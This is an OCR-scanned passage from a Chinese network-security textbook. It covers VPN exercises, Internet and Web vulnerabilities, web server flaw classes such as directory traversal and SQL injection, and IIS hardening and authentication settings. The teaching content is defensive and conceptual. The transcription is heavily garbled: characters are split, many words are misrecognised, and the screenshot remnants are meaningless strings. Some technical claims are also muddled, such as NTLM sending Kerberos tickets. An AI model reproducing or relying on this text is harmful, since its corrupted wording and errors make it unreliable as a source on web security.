TeamViewer 和 向 日 葵 软 件 一 样 也 支持 APP 方式 控制 受 控 主 机 ,而 且 TeamViewer 的 
远程 桌面 屏幕 刷新 响应 速度 更 快 。 


(CE .6 课外 练习 
有 操作 题 


(1) 通过 搜索 引擎 了 解 VPN 的 硬件 ,如 通过 EasyConnect 的 软 硬 件 ,实现 企业 VPN 
系统 。 

(2) 了 解 其 他 免费 个 人 VPN 工具 或 网 站 。 

(3) 了 解 思科 相应 的 VPN 客户 端 工 具 及 移动 端 通过 IPSec 方式 进行 VPN 客户 端的 配 
置 方法 (Cisco VPN Client 或 Cisco AnyConnect) 。 

(4) 下 载 开 源 软 件 OpenVPN, 了 解 自 定义 开发 VPN 拨号 程序 的 一 般 方法 。 

(5) 使 用 TeamViewer 软件 ,快速 构建 远程 控制 环境 。 


Web 的 安全 性 





本 章 介绍 常见 的 Web 安全 问题 ,围绕 Web 服务 器 安全 、 脚 本 语言 的 安全 ,浏览 器 的 安 
全 进行 了 基本 原理 ,应 用 操作 的 讲解 ,重点 介绍 具体 的 Web 安全 设置 方法 。 此 外 ,本 章 还 介 
绍 数据 库 的 安全 性 和 电子 商务 的 安全 性 。 


> 知识 点 


(1) Internet 脆弱 性 和 常见 Web 安全 问题 。 
(2) IIS 的 安全 配置 。 

(3) SET 和 SSL 协议 。 

(4) 数据 库 安全 与 SQL 注入 。 

(5) XSS 攻击 。 

(6) 服务 器 、 脚 本 和 浏览 器 的 安全 配置 。 


局 同 教 半 B 标 


(1) 理解 Internet 脆弱 的 原因 。 

(2) 了 解 常见 Web 安全 问题 。 

(3) 理解 电子 商务 的 SSL、SET 安全 协议 。 

(4) 掌握 网 络 站 点 安全 技术 相关 概念 。 

(5) 理解 SQL 注入 的 基本 工作 过 程 。 

(6) 了 解 XSS 攻击 的 原理 。 

(7) 掌握 服务 器 、 脚 本 和 浏览 器 的 安全 配置 。 

(8) 理解 数据 库 的 安全 策略 和 机 制 、 体 系 与 防护 。 
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计算 机 给 人 们 的 生活 带 来 了 很 多 便利 ,不 仅 将 很 多 计算 机 连接 在 一 起 ,还 提供 了 丰富 的 
信息 资源 。 在 互联 网 上 能 随时 得 到 很 多 信息 ,但 是 由 于 计算 机 网 络 是 没有 边界 的 ,目前 基于 
计算 机 网 络 的 法 律 和 法 规 也 不 完善 ,人 们 在 计算 机 网 络 上 的 行为 几乎 是 不 受 限制 的 ,导致 利 
用 计算 机 网 络 进行 的 安全 攻击 越 来 越 多 。 特 别 是 对 Web 的 安全 攻击 , 随 着 Internet 的 发 展 
而 不 断 增多 。 影 响 Web 安全 性 的 因素 主要 有 以 下 几 个 方面 。 

(1) 由 于 Web 服务 器 存在 的 安全 漏洞 和 复杂 性 ,使 依赖 这 些 服务 器 的 系统 面临 一 些 无 
法 预测 的 风险 。Web 站 点 的 安全 问题 可 能 涉及 与 其 相连 的 内 部 局 域 网 ,如 果 局 域 网 和 广 域 
网 相连 ,还 可 能 影响 到 广域网 上 的 其 他 组 织 。 另 外 ,Web 站 点 还 经 常 成 为 黑客 攻击 其 他 站 点 
的 跳板 。 随 着 Internet 的 发 展 ,缺乏 有 效 安 全 机 制 的 Web 服务 器 正面 临 着 成 千 上 万 种 计算 
机 病毒 的 威胁 。 蠕 虫 .木马 .逻辑 炸弹 等 多 种 病毒 的 相继 出 现 , 使 Web 服务 器 的 安全 问题 显 
得 更 加 重要 。 

(2) Web 程序 员 由 于 工作 失误 或 者 程序 设计 上 的 漏洞 ,也 可 能 造成 Web 系统 的 安全 缺 
陷 。 这 些 缺 陷 容易 被 内 部 员工 .网 络 间谍 或 和 侵 者 所 利用 。 因 此 ,在 Web 服务 程序 的 脚本 
程序 的 设计 上 ,提高 网 络 编程 质量 也 是 提高 Web 安全 性 的 重要 方面 。 

(3) 随 着 计算 机 网 络 技术 的 快速 发 展 与 广泛 应 用 ,各 种 电子 商务 和 微 商 的 应 用 更 加 普 
及 深入 ,与 此 同时 电子 商务 的 安全 “瓶颈 ”问题 也 变 得 更 为 突出 。 构 建安 全 可 靠 的 电子 商务 
运营 及 应 用 环境 ,已 经 成 为 电子 商务 企业 与 消费 者 共同 关注 的 重要 热点 问题 。 实 际 上 ,解决 
电子 商务 安全 问题 也 是 Web 安全 技术 的 一 项 综合 应 用 。 

(4) 网 络 系统 中 最 重要 、 最 有 价值 的 是 存储 在 数据 库 中 的 数据 资源 ,网 络 安 全 的 关键 及 
核心 是 其 数据 安全 。 在 现代 信息 化 社会 ,数据 库 技术 已 经 成 为 信息 化 建设 和 信息 资源 共享 
的 关键 ,数据 库 是 各 种 重要 数据 处 理 和 存储 的 核心 ,数据 库 技术 的 广泛 应 用 ,也 带 来 了 安全 
风险 。 这 也 是 Web 安全 性 的 重要 体现 。 

(5) 用 户 是 通过 浏览 器 与 Web 服务 器 或 应 用 进行 交互 的 ,由 于 浏览 器 本 身 的 安全 漏洞 ， 
使 非法 用 户 可 以 通过 浏览 器 攻击 Web 站 点 ,这 也 是 需要 警惕 的 一 个 重要 方面 。 

Web 是 应 用 最 多 的 一 种 网 络 服务 ,也 称 为 WWW 服务 。Web 是 各 个 单位 的 Intranet 的 
核心 。 由 于 上 述 因 素 , 使 Web 的 安全 问题 日 益 得 到 重视 。 

【案例 7-1】 我 国 第 一 个 安全 电子 商务 系统 “东方 航空 公司 网 上 订 票 与 支付 系统 ”经 过 
半年 试 运行 后 ,于 1999 年 8 月 8 日 投入 正式 运行 , 它 由 上 海 市 政府 商业 委员 会 、 上 海 市 邮电 
管理 局 中 国 东方 航空 股份 有 限 公司 、 中 国 工商 银行 上 海 市 分 行 、 上 海 市 电子 商务 安全 证 书 
管理 中 心 有 限 公司 等 共同 发 起 、 投 资 与 开发 。 


了 7.1.1 Internet 的 脆弱 性 
Internet 是 全 球 最 大 、 覆 盖 范 围 最 广 的 计算 机 互联 网 络 , 是 使 用 公共 语言 进行 通信 的 计 
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算 机 网 络 。Internet 本 身 是 没有 边界 .国界 的 ,不 属于 任何 一 个 国家 或 组 织 。 由 于 在 
Internet 上 没有 完善 的 法 律 和 法 规 , 人 们 在 Internet 上 进行 的 行为 几乎 都 是 不 受 限制 的 ,这 
样 导 致 了 Internet 有 很 多 的 安全 隐患 ,主要 表现 在 以 下 几 方面 。 

(1) Internet 本 身 是 没有 边界 、 没 有 国界 的 ,这 给 黑客 进行 跨国 攻击 提供 了 便利 。 

(2) 在 Internet 上 ,通过 IP 地 址 来 唯一 识别 网 络 用 户 ,而 这 种 识别 机 制 是 不 可 靠 的 。 通 
过 IP 地 址 来 识别 和 管理 用 户 存在 严重 的 安全 漏洞 。 

(3) Internet 本 身 没 有 中 央 监 控 管 理 机 制 ,没有 完善 的 法 律 和 法 规 ,因此 无 法 对 通过 
Internet 的 犯罪 进行 有 效 的 处 理 。 

(4) Internet 本 身 没有 审计 和 记录 功能 ,对 发 生 的 事情 没有 记录 。 这 也 是 一 个 重要 的 隐患 。 

(5) Internet 从 技术 上 讲 是 开放 的 ,标准 的 ,但 是 从 根本 上 没有 考虑 太 多 的 安全 因素 。 


j 7.1.2 Web 的 安全 问题 


随 着 Internet 的 发 展 ,出 现 了 基于 三 层 结 构 模 型 的 Web 技术 。 在 三 层 结构 中 ,应 用 岁 
辑 程 序 已 从 客户 机 上 分 离 出 来 。 这 是 一 种 “ 瘦 客 户 端 "(Thin Client) 的 网 络 结构 模式 。 客 户 
端 只 存在 界面 显示 程序 ,只 须 在 服务 器 端 随机 增加 应 用 服务 , 即 可 满足 系统 的 需要 ,可 以 用 
较 少 的 资源 建立 起 具有 很 强 伸缩 性 的 系统 。 

Internet 的 脆弱 性 同样 也 导致 了 Web 技术 在 应 用 上 存在 不 少 的 安全 问题 。Web 站 点 
的 安全 问题 主要 表现 在 以 下 几 个 方面 。 

(1) 未 经 授权 的 存 取 动 作 。 由 于 操作 系统 等 方面 的 漏洞 ,使 未 经 授权 的 用 户 可 以 获得 
Web 服务 器 上 的 文件 和 数据 ,甚至 可 以 对 Web 服务 器 上 的 数据 进行 修改 ,删除 等 操作 ,这 是 
Web 站 点 安全 一 个 最 重要 的 安全 问题 。 

(2) 窃取 系统 的 信息 。 非 法 用 户 侵入 系统 内 部 ,获取 系统 的 一 些 重要 信息 ,如 用 户 名 、 
用 户口 令 ,加密 密 钥 等 。 利 用 窃取 的 这 些 系统 信息 ,达到 进一步 攻击 系统 的 目的 。 

(3) 破坏 系统 。 破 坏 系 统 是 指 对 网 络 系统 ,操作 系统 、 应 用 系统 等 的 破坏 。 

(4) 非法 使 用 。 非 法 使 用 是 指 用 户 对 未 经 授权 的 程序 、 命 令 进行 非法 使 用 ,使 之 能 够 修 
改 或 破坏 系统 。 

(5) 病毒 破坏 。 目 前 , Web 站 点 面临 着 各 种 病毒 的 威胁 。 蠕虫 .木马 .电子 邮件 炸弹 、 俱 
辑 炸 弹 等 多 种 计算 机 病毒 相继 出 现 ,使 网 络 环 境 更 加 复杂 。 


了 7.1.3 ”Web 安全 的 实现 方法 


从 TCP/IP 协议 集 的 角度 ,实现 Web 安全 的 方法 可 以 划分 为 3 种 。 

1) 基于 网 络 层 实 现 Web 安全 

传统 的 安全 体系 一 般 都 建立 在 应 用 层 , 但 是 由 于 网 络 层 的 IP 数据 包 本 身 不 具备 任何 安 
全 特性 ,很 容易 被 查看 、 算 改 、 伪 造 和 重播 ,因此 有 很 大 的 安全 隐患 ,基于 网 络 层 的 Web 安全 
技术 能 够 很 好 地 解决 这 一 问题 。 其 中 ,IPSec 可 提供 基于 端 到 端的 安全 机 制 ,可 以 在 网 络 层 
上 对 数据 包 进 行 安全 处 理 , 以 保证 数据 的 机 密 性 和 完整 性 。 这 样 ,各 种 应 用 层 的 程序 就 可 以 
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享用 IPSec 提供 的 安全 服务 和 密 钥 管 理 , 而 不 必 设计 和 实现 自己 的 安全 机 制 , 因 此 减少 了 密 
钥 协 商 的 开销 ,降低 了 产生 安全 漏洞 的 可 能 性 。 

2) 基于 传输 层 实 现 Web 安全 

SSL 协议 就 是 一 种 常见 的 基于 传输 层 实现 Web 安全 的 解决 方案 。SSL 提供 的 安全 服 
务 采 用 对 称 加 密 和 公 钥 加 密 两 种 加 密 机 制 ,对 Web 服务 器 和 客户 端的 通信 提供 机 密 性 、 
完整 性 的 认证 。SSL 协议 在 应 用 层 协议 通信 之 前 ,就 已 经 完成 加 密 算法 .通信 密 钥 和 协 
商 , 以 及 服务 器 认证 工作 ,在 此 之 后 应 用 层 协议 所 传送 的 数据 都 会 被 加 密 , 从 而 保证 通信 的 
安全 

3) 基于 应 用 层 实 现 Web 安全 

这 种 解决 方案 是 针 安 全 服务 直接 嵌入 到 应 用 程序 中 ,从 而 在 应 用 层 实现 通信 安全 。 如 
SET 协议 等 。 


7.2 ”Web 服务 器 的 安全 性 


j 7.2.1 Web 服务 器 的 作用 


传统 的 信息 系统 应 用 模式 客户 /服务 器 (Client/Server,C/S) 模 式 。 服 务 器 通常 采用 高 
性 能 的 PC .工作 站 或 小 型 机 ,并 采用 大 型 数据 库 系 统 , 如 Oracle、Sybase、Informix 或 SQL 
Server。 客 户 端 需要 安装 专用 的 客户 端 软 件 。 在 C/S 体系 结构 中 ,服务 器 端 完 成 存储 数据 、 
对 数据 进行 统一 的 管理 ,统一 处 理 多 个 客户 端的 并 发 请 求 等 功能 ,客户 端 作为 和 用 户 交 互 的 
程序 ,完成 用 户 界面 的 设计 数据 请 求 和 表示 等 工作 。 在 Internet 出 现 以 前 ,大 多 数 的 信息 
系统 都 是 采用 这 种 模式 的 。 其 基本 架构 如 图 7-1 所 示 。 


服务 器 











客户 机 客户 机 客户 机 客户 机 客户 机 
图 7-1 基于 C/S 架构 的 信息 系统 
C/S 体系 结构 虽然 采用 的 是 开放 模式 ,但 这 只 是 系统 开发 一 级 的 开放 性 ,在 特定 的 应 用 
中 无 论 是 Client 端 还 是 Server 端 都 还 需要 特定 的 软件 支持 。 由 于 没 能 提供 用 户 真正 期 望 的 
开放 环境 ,C/S 体系 结构 的 软件 需要 针对 不 同 的 操作 系统 开发 不 同 版 本 的 软件 ,加 之 产品 的 
更 新 换代 非常 快 ,已 经 很 难 适应 百 台 计算 机 以 上 局 域 网 用 户 同时 使 用 。 而 且 代 价 高 ,效率 低 。 


一 一 一作 


2 必 DD 











由 于 Client/Server 体系 结构 存在 的 种 种 问题 ,因此 人 们 又 在 它 原 有 的 基础 上 提出 了 一 
种 具有 三 层 体系 结构 (Browser/ Web/Database, 3-Tier) 的 应 用 系统 结构 浏览 器 /服务 器 
(Browser/Server,B/S) 体 系 结构 ,如 图 7-2 所 示 。Browser/Server 体系 结构 是 伴随 着 因 特 
网 的 兴起 ,对 Client/Server 体系 结构 的 一 种 改进 。 从 本 质 上 说 ,Browser/Server 体系 结构 
也 是 一 种 Client/Server 体系 结构 , 它 可 看 作 一 种 由 传统 的 二 层 体 系 结构 Client/Server 发 展 
而 来 的 三 层 体系 结构 Client/Server 在 Web 上 应 用 的 特例 。 
1 1 
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图 7-2 基于 BWD 的 三 层 体系 结构 的 信息 系统 


Browser/Server 体系 结构 主要 是 利用 了 不 断 成 熟 的 Web 浏览 器 技术 : 结合 浏览 器 的 多 
种 脚本 语言 和 ActiveX 技术 ,用 通用 浏览 器 实现 原来 需要 复杂 专用 软件 才能 实现 的 强大 功 
能 ,同时 节约 了 开发 成 本 。 

B/S 体系 结构 最 大 的 优点 如 下 。 

(1) 客户 端 统一 使 用 Web 浏览 器 ,使 客户 端 简单 方便 。 

(2) 基于 Web 技术 ,使 用 统一 的 TCP/IP 协议 。 

(3) 可 以 在 任何 地 方 进行 操作 而 不 用 安装 任何 专门 的 软件 ,只 要 有 一 台 能 上 网 的 计算 
机 就 能 使 用 ,客户 端 零 安装 、. 零 维 护 。 

(4) 系统 的 扩展 非常 容易 。 

(5) 易于 将 多 种 技术 集成 在 一 起 。 对 多 种 不 同 的 应 用 可 以 做 到 统一 、 集 中 管理 。 

由 于 Web 服务 器 的 广泛 使 用 ,使 信息 的 发 布 ,传播 和 获取 变 得 非常 方便 快捷 ,而 且 开销 
低廉 ,覆盖 范围 广 。 同 时 , Web 也 增进 了 人 们 的 交互 , 越 来 越 多 的 人 通过 Web 进行 交流 和 工 
作 , 很 多 商家 也 通过 Web 提供 给 用 户 各 种 便利 的 服务 。 


了 7.2.2 Web 服务 器 存在 的 问题 


Web 服务 器 的 安全 问题 主要 有 以 下 3 方面 内 容 。 

(1) 操作 系统 本 身 的 安全 漏洞 。 例 如 ,由 于 服务 器 操作 系统 的 安全 问题 ,使 未 经 授权 的 
用 户 可 以 获得 Web 服务 器 上 的 文件 .目录 或 重要 数据 等 。 

(2) 明文 或 弱 口 令 问 题 。 从 远程 用 户 向 服务 器 发 送信 息 时 ,特别 是 敏感 信息 ,中 途 会 遭 
到 不 法 分 子 非法 拦截 。 如 果 用 户 和 服务 器 之 间 的 通信 和 是 明文 或 弱 口 令 的 加 密 方式 ,那么 不 
法 分 子 就 会 很 容易 得 到 所 传送 的 信息 ,利用 这 些 信息 ,就 可 以 进行 进一步 和 攻击 行为 。 

(3) Web 服务 器 本 身 存在 的 一 些 安全 问题 。 

@ 物理 路 径 泄 露 。 物 理 路 径 泄 露 一 般 是 由 于 Web 服务 器 处 理 用 户 请 求 出 错 导致 的 ,如 
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通过 提交 一 个 超 长 的 请 求 , 或 者 是 某 个 精心 构造 的 特殊 请 求 ,或 是 请 求 一 个 Web 服务 器 上 
不 存在 的 文件 。 这 些 请 求 都 有 一 个 共同 特点 , 那 就 是 被 请 求 的 文件 肯定 属于 CGI 脚本 ,而 不 
是 静态 HTML 页 面 。 

@ 目录 遍历 。 目 录 遍 历 对 于 Web 服务 器 来 说 并 不 多 见 ,通过 对 任意 目录 附加 “.. /”, 或 
者 是 在 有 特殊 意义 的 目录 附加 “../”, 或 者 是 附加 “../” 的 一 些 变 形 , 如 *..\” 或 “..//” 其 至 
其 编码 ,都 可 能 导致 目录 遍历 。 前 一 种 情况 并 不 多 见 , 但 是 后 面 的 几 种 情况 就 常见 得 多 ,以 
前 非常 流行 的 IIS 二 次 解码 漏洞 和 Unicode 解码 漏洞 都 可 以 看 作 变 形 后 的 编码 。 

@ 执行 任意 命令 。 执 行 任意 命令 即 执行 任意 操作 系统 命令 ,主要 包括 两 种 情况 : 一 种 
情况 是 通过 遍历 目录 ,如 前 面 提 到 的 二 次 解码 和 Unicode 解码 漏洞 ,来 执行 系统 命令 ; 男 一 
种 情况 是 Web 服务 器 把 用 户 提交 的 请 求 作为 SSI 指令 解析 ,因此 导致 执行 任意 命令 。 

@ 缓冲 区 溢出 。 缓 冲 区 溢出 是 指 Web 服务 器 没有 对 用 户 提交 的 超 长 请 求 进行 合适 的 
处 理 , 这 种 请 求 可 能 包括 超 长 URL, 超 长 HTTP Header 域 ,或 者 是 其 他 超 长 的 数据 。 这 种 
漏洞 可 能 导致 执行 任意 命令 或 者 是 拒绝 服务 ,这 一 般 取决 于 构造 的 数据 。 

@ 拒绝 服务 。 拒 绝 服务 产生 的 原因 多 种 多 样 , 主 要 包括 超 长 URL、 特 殊 目 录 、 超 长 
HTTP Header 域 , 畸 形 HTTP Header 域 或 者 是 DOS 设备 文件 等 。 由 于 Web 服务 器 在 处 
理 这 些 特殊 请 求 时 不 能 处 理 或 者 是 处 理 方式 不 当 , 因 此 出 错 终 止 或 挂 起 。 

@ SQL 注入。SQL 注入 漏洞 是 在 编程 过 程 中 造成 的 。 后 台数 据 库 允许 动态 SQL 语句 
的 执行 。 前 台 应 用 程序 没有 对 用 户 输入 的 数据 或 者 页 面 提交 的 信息 (如 POST、GET) 进 行 
必要 的 安全 检查 。 是 由 数据 库 自 身 的 特性 造成 的 ,与 Web 程序 的 编程 语言 无 关 。 几 乎 所 有 
的 关系 数据 库 系 统 和 相应 的 SQL 语言 都 面临 SQL 注入 的 潜在 威胁 。 

@ 条 件 竞争 。 这 里 的 条 件 竞争 主要 针对 一 些 管理 服务 器 而 言 , 这 类 服务 器 一 般 是 以 
System 或 Root 身份 运行 的 。 当 它们 需要 使 用 一 些 临 时 文件 ,而 在 对 这 些 文件 进行 写 操作 
之 前 , 却 没 有 对 文件 的 属性 进行 检查 ,一 般 可 能 导致 重要 系统 文件 被 重 写 ,甚至 获得 系统 控 
制 权 。 

@ CGI 漏洞。 通过 CGI 脚本 存在 的 安全 漏洞 ,如 暴露 敏感 信息 、 默 认 提 供 的 某 些 正常 
服务 未 关闭 、 利 用 某 些 服务 漏洞 执行 命令 、 应 用 程序 存在 远程 溢出 、 非 通用 CGI 程序 的 编程 
漏洞 。 

从 Web 服务 器 的 版 本 上 分 析 , 不 管 是 IIS, 还 是 Apache, 都 存在 不 同 程度 的 安全 漏洞 问 
题 。 还 有 一 些 简单 的 Web 服务 器 , 仅 为 测试 用 .没有 过 多 地 考虑 到 一 些 安全 因素 ,不 能 用 于 
商业 用 途 。 

因此 ,不 管 是 配置 服务 器 ,还 是 在 编写 程序 时 ,都 要 注意 系统 的 安全 性 。 尽 量 防御 任何 
的 漏洞 ,创造 安全 的 运行 环境 。 要 最 大 限度 地 降低 由 于 Web 服务 器 的 安全 漏洞 引起 的 问 
题 ,主要 还 在 于 Web 服务 器 管理 上 ,如 要 定期 下 载 安 全 补丁 .加密 传输 数据 ,严格 口令 管理 等 。 

在 增强 Web 服务 器 的 安全 性 时 ,应 该 遵循 以 下 3 个 原则 。 

(1) 配置 程序 使 其 只 能 提供 指定 的 服务 。 

(2) 不 到 必要 的 时 候 不 能 暴露 任何 信息 。 

(3) 如 果 系 统 遭 到 入 侵 , 应 该 最 大 限度 地 减少 损坏 。 
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j* 7.2.3 IIS 的 安全 


Web 服务 器 软件 有 很 多 ,其 中 IIS(Internet Information Services) 应 用 最 为 广泛 。IIS 是 
由 微软 公司 提供 的 基于 运行 Microsoft Windows 的 互联 网 基本 服务 ,是 一 种 Web 服务 组 件 ， 
其 中 包括 Web 服务 器 .FTP 服务 器 .NNTP 服务 器 和 SMTP 服务 器 ,分 别 用 于 网 页 浏览 、 文 
件 传输 .新 闻 服 务 和 邮件 发 送 等 , 它 使 用 户 在 网 络 (包括 互联 网 和 局 域 网 ) 上 发 布 信息 成 了 一 
件 很 容易 的 事 。 

IIS 提供 一 种 开放 服务 ,其 发 布 的 文件 和 数据 是 无 须 进 行 保护 的 ,但 是 IS 作为 
Windows 操作 系统 的 一 部 分 , 却 可 能 由 于 自身 的 安全 漏洞 导致 整个 Windows 操作 系统 被 攻 
陷 。 目 前 ,很 多 黑客 正 是 利用 IIS 的 安全 漏洞 成 功 实现 了 对 Windows 操作 系统 的 攻击 ,获取 
了 特权 用 户 权 限 和 敏感 数据 ,因此 加 强 IIS 的 安全 是 必要 的 。 


Li: lIS 安装 安全 


IIS 是 Windows 系统 的 一 个 组 件 , 可 以 选择 是 否 安装 组 件 。 保 证 IIS 安全 性 要 从 IIS 安 
全 安装 开始 ,要 构建 一 个 安全 的 IIS 服务 器 ,必须 从 安装 时 就 充分 考虑 安全 问题 。 如 修改 IIS 
的 安装 默认 路 径 . 打 最 新 的 IIS 补丁 包 等 。 

在 安装 IIS 之 后 ,服务 器 上 将 默认 生成 TUSER_Computername( 其 中 Computername 是 
计算 机 的 名 字 ) 的 匿名 账户 ,该 账户 被 添加 到 域 用 户 组 里 ,从 而 把 应 用 于 域 用 户 组 的 访问 权 
限 提供 给 访问 IIS 服务 器 的 每 个 匿名 用 户 , 这 不 仅 给 TS 带 来 了 很 大 的 安全 隐患 ,还 可 能 威 
胁 到 整个 域 资源 的 安全 。 因 此 ,要 尽量 避免 把 IIS 安装 到 域 控制 器 上 ,尤其 是 主 域 控制 器 。 

同时 ,在 安装 IIS 的 Web、FTP 等 服务 时 ,应 该 尽量 避免 安装 在 系统 分 区 上 ,IIS 服务 安 
装 在 系统 分 区 上 ,会 使 系统 文件 和 IIS 服务 器 文件 面临 非法 访问 ,容易 造成 非法 用 户 入 侵 系 
统 分 区 。 


12. 用 户 控制 安全 


通过 IIS 运行 的 网 站 ,默认 允许 所 有 用 户 匿 名 访问 ,网 络 中 的 用 户 无 须 输 入 用 户 名 和 密 
码 ,就 可 以 任意 访问 Web 网 页 。 而 对 于 一 些 安全 性 要 求 较 高 的 Web 网 站 ,或 者 Web 网 站 中 
拥有 敏感 信息 时 ,也 可 以 采用 多 用 户 认 证 方式 ,对 用 户 进 行 身份 验证 ,从 而 确保 只 有 经 过 授 
权 的 用 户 才能 实现 对 Web 信息 的 访问 和 浏览 。 

(1) 禁止 匿名 访问 。 安 装 IIS 后 ,默认 生成 的 TUSER_Computername 匿名 用 户 给 Web 
服务 器 带 来 了 很 大 的 安全 隐患 ,应 该 对 访问 用 户 的 访问 权限 进行 设置 ,限制 匿名 用 户 的 自动 
登录 。 取 消 匿 名 访问 ,具体 步骤 如 下 。 

@ 启动 “Internet 信息 服务 (1IS) 管 理 器 ”, 在 功能 视图 中 ,双击 “身份 验证 ”选项 ,如 
图 7-3 所 示 。 

@ 在 图 7-3 中 ,选择 “匿名 身份 验证 ?选项 , 右 击 可 以 设置 启用 或 禁用 验证 项 。 或 在 IIS 
管理 器 的 右 侧 , 单 击 相应 的 设置 项 。 


@ 一 一 一 












宇 ITaternet 信息 服务 (CTS) 管 理 吉 


GS | 与 ,carns ， 


文件 F) 视图 W) 帮助 00 
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已 启用 




















图 7-3 在 身份 验证 中 的 匿名 身份 验证 


(2) 使 用 用 户 身 份 验证 。 在 Windows Server 2008 以 上 版 本 中 ,IIS 7.0 以 上 提供 了 多 


种 身份 验证 方法 。 系 统 默认 只 启用 了 匿名 身份 验证 ,另外 三 种 需要 通过 添加 角色 服务 的 方 
式 来 添加 ,如 图 7-4 所 示 。 
9 服务 叶 管 理 叶 
文件 中 操作 和 0 查看 帮助 00 
钊 中 | 方 | 轴 | 卓 
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起 前 加 
田 三 feb 服务 器 GTS) 


四 本文 寺 , 查看 雪 革 在 服务 器 上 角色 的 运行 拓 兄 ， 以 及 添加 或 有 角 色 和 功能 。 
辣 长 下 Ea 未 雪村 
田中 让 条 自 定义 日 志 记 录 未 安装 
oc 日 志 记录 未 安装 


日 









基本 身份 验证 安装 
Windows 身份 验证 未 安装 
摘要 式 身份 验证 未 安装 
客户 端 证 书 映射 身份 验证 未 安装 
IIS 客户 庙 证 书 映射 身份 验证 未 安装 








WL 授权 未 安装 
圳 请 求 训 选 已 安装 
IP 和 域 限制 未 安装 





图 7-4 在 身份 验证 的 自 定义 安装 


在 “默认 域 "? 和 “领域 ”文本 框 内 要 输入 使 用 的 域名 (默认 域 : 可 以 添加 域 账户 ,或 将 其 留 
空 ,将 依据 此 域 对 登录 到 站 点 时 未 提供 域 的 用 户 进行 身份 验证 ; 领域 : 随便 输入 ,将 被 显示 
到 登录 界面 上 )。 如 果 不 填 , 则 将 运行 IIS 的 服务 器 的 域 用 做 默认 域 。 

除了 匿名 登录 身份 验证 以 外 ,以 下 简单 介绍 常用 的 身份 验证 方式 。 

Q@ 基本 身份 验证 。 这 种 身份 验证 是 标识 用 户 身份 的 广 为 使 用 的 行业 标准 方法 。 要 使 
用 基本 身份 验证 必须 先 禁用 匿名 访问 。 使 用 基本 身份 验证 可 限制 对 NTFS 格式 的 Web 服 
务 器 上 文件 的 访问 。 使 用 基本 身份 验证 ,用 户 必须 输入 凭据 ,而 且 访 问 是 基于 用 户 ID 的 。 
用 户 ID 和 密码 都 以 明文 形式 在 网 络 间 进行 发 送 。 要 使 用 基本 身份 验证 , 需 授予 每 个 用 户 进 
行 本 地 登录 的 权限 ,为 了 使 管理 更 加 容易 ,需要 把 每 个 用 户 都 添加 到 可 以 访问 所 需 文 件 的 组 
中 。 因 为 用 户 凭据 是 使 用 Base64 编码 技术 编码 的 ,但 用 户 赁 据 在 通过 网 络 传输 时 不 经 过 加 
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密 , 所 以 基本 身份 验证 被 认为 是 一 种 不 安全 的 身份 验证 方式 。 


@ Windows 身份 验证 。Windows 身份 验证 比 基 本 身份 验证 安全 ,而 且 在 用 户 具 有 
Windows 域 账户 的 内 部 网 环境 中 能 很 好 地 发 挥 作用 。 在 集成 Windows 身份 验证 中 ,浏览 器 
尝试 使 用 当前 用 户 在 域 登录 过 程 中 使 用 的 凭据 ,如 果 此 尝试 失败 ,就 会 提示 该 用 户 输入 用 户 
名 和 密码 。 如 果 用 户 使 用 集成 Windows 身份 验证 , 则 用 户 的 密码 将 不 传送 到 服务 器 。 如 果 
用 户 作 为 域 用 户 登 录 到 本 地 计算 机 , 则 此 用 户 在 访问 该 域 中 的 网 络 计算 机 时 不 必 再 次 进行 
身份 验证 。 集 成 身份 验证 以 前 称 为 NTLM 或 Windows NT 质询 /响应 身份 验证 ,此 方法 以 
Kerberos 票证 的 形式 通过 网 络 向 用 户 发 送 身 份 验证 信息 ,并 提供 较 高 的 安全 级 别 。 集 成 
Windows 身份 验证 使 用 Kerberos 5 和 NTLM 身份 验证 。 

的 注意 : 如 果 选 择 了 多 个 身份 验证 选项 ,IIS 服务 会 首先 尝试 协商 最 安全 的 方法 ,然后 
它 按 可 用 身份 验证 协议 的 列表 向 下 逐个 试用 其 他 协议 ,直到 找到 客户 端 和 服务 器 都 支持 的 
某 种 共有 的 身份 验证 协议 。 

尽管 集成 Windows 身份 验证 非常 安全 ,但 在 通过 HTTP 代理 连接 时 ,集成 Windows 身 
份 验证 将 不 起 作用 ,无 法 在 代理 服务 器 或 其 他 防火 墙 应 用 程序 后 使 用 。 因 此 ,集成 Windows 
身份 验证 最 适合 企业 Intranet 环境 。 

@ 摘要 式 身份 验证 。 摘 要 式 身 份 验证 提供 了 和 基本 身份 验证 相同 的 功能 ,但 是 ,摘要 
式 身份 验证 在 通过 网 络 发 送 用户 赁 据 方面 提高 了 安全 性 。 摘 要 式 身份 验证 需要 用 户 ID 和 
密码 ,可 提供 中 等 的 安全 级 别 ,如 果 用 户 要 允许 从 公共 网 络 访问 安全 信息 , 则 可 以 使 用 这 种 
方法 。 这 种 方法 与 基本 身份 验证 提供 的 功能 相同 。 摘 要 式 身 份 验 证 克服 了 基本 身份 验证 的 
许多 缺点 。 在 使 用 摘要 式 身份 验证 时 ,密码 不 是 以 明文 形式 发 送 的 。 另 外 ,用 户 可 以 通过 代 
理 服务 器 使 用 摘要 式 身份 验证 。 摘 要 式 身 份 验证 使 用 一 种 质询 /响应 机 制 (集成 Windows 
身份 验证 使 用 的 机 制 ), 其 中 的 密码 是 以 加 密 形式 发 送 的 。 

要 使 用 摘要 式 身份 验证 ,必须 满足 下 述 要 求 。 

a. 用 户 和 IIS 服务 器 必须 是 同一 个 域 的 成 员 或 被 同一 个 域 信任 。 

b. 用 户 必须 有 一 个 存储 在 域 控制 器 上 Active Directory 中 的 有 效 Windows 用 户 账 户 。 

c。 该 域 必 须 使 用 Microsoft Windows 2000 或 更 高 版 本 的 域 控制 器 。 

d. 必须 将 IISSuba. dll 文件 安装 到 域 控制 器 上 。 此 文件 会 在 Windows 2000 或 
Windows Server 2003 的 安装 过 程 中 自动 复制 。 

e. 必须 将 所 有 用 户 账户 配置 为 选择 “使 用 可 道 的 加 密 保存 密码 ”账户 选项 。 要 选择 此 
账户 选项 ,必须 重 置 或 重新 输入 密码 。 

@ Microsoft . NET Passport 身份 验证 。. NET Passport 身份 验证 提供 了 单一 登录 安全 
性 ,为 用 户 提供 对 Internet 上 各 种 服务 的 访问 权限 。 如 果 选 择 此 选项 ,对 IIS 服务 的 请 求 必 
须 在 查询 字符 串 或 Cookie 中 包含 有 效 的 . NET Passport 凭据 。 如 果 IIS 服务 不 检测 . NET 
Passport 凭据 ,请 求 就 会 被 重 定向 到 . NET Passport 登录 页 。 并 且 , 如 果 选 择 此 选项 ,所 有 
其 他 身份 验证 方法 都 将 不 可 用 。 

